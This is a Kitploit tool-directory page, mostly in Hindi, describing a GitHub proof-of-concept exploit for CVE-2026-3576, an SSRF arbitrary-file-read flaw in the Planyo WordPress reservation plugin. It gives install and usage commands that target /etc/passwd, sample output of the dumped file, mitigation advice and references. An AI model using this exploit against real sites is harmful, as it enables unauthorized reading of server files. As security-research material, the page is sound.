Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-3576 — CVE-2026-3576 के लिए प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/anirbala98/cve-2026-3576
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubanirbala98/cve-2026-3576

CVE-2026-3576

CVE-2026-3576 के लिए प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट

रिपॉजिटरी देखें
21161 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-3576 - Wordpress Plugin Planyo Online Reservation System <= 3.0 - SSRF के माध्यम से मनमानी फ़ाइल पढ़ना

इस रेपो में CVE-2026-3576 के लिए एक पायथन आधारित Proof of Concept (PoC) एक्सप्लॉइट है। यह Exploit-DB में भी यहाँ पाया जा सकता है।

मैंने इस एक्सप्लॉइट के लिए एक Metasploit मॉड्यूल भी विकसित किया है जो यहाँ पाया जा सकता है।

अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है। इसका उपयोग उन सिस्टमों के विरुद्ध न करें जिनके आप स्वामी नहीं हैं या जिनका परीक्षण करने की अनुमति आपके पास नहीं है।

अवलोकन

Wordpress में Planyo Online Reservation System प्लगइन में संस्करण 3.1 से पहले एक Server Side Request Forgery (SSRF) भेद्यता मौजूद है। यह एक अनधिकृत हमलावर को ulap_url पैरामीटर के माध्यम से file:// URL प्रदान करने की अनुमति देता है, जिसके परिणामस्वरूप मनमानी फ़ाइल पहुँच होती है।

स्रोत कोड विश्लेषण और एक्सप्लॉइट प्रदर्शन के साथ एक विस्तृत राइटअप मेरे Medium ब्लॉग पर पाया जा सकता है।

प्रभावित संस्करण

घटकसंस्करण
भेद्य प्लगइन<=3.0
पैच किया गया प्लगइन3.1

आवश्यकताएँ

  • Python 3.13.14
  • Requests 2.32.5

स्थापना

git clone https://github.com/anirbala98/CVE-2026-3576.git
cd CVE-2026-3576/
pip install -r requirements.txt

उपयोग

python exploit.py <base_url> -f <file location> --disable-check
python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd

उदाहरण

└─$ python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd                             
[*] Checking if target is vulnerable...
[+] Version found: 2.9
[+] Target is vulnerable

[*] Attempting to read arbitrary file...

root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

शमन

प्लगइन को संस्करण 3.1 में अपग्रेड करें।

संदर्भ

  • https://nvd.nist.gov/vuln/detail/CVE-2026-3576
  • https://www.planyo.com/wordpress-reservation-system/
  • https://plugins.svn.wordpress.org/planyo-online-reservation-system/tags/2.9/
  • https://www.exploit-db.com/exploits/52636
  • https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.rb
  • https://anirbala98.medium.com/from-source-code-to-exploit-understanding-cve-2026-3576-3fa9754bd8d3
टूल डाउनलोड करें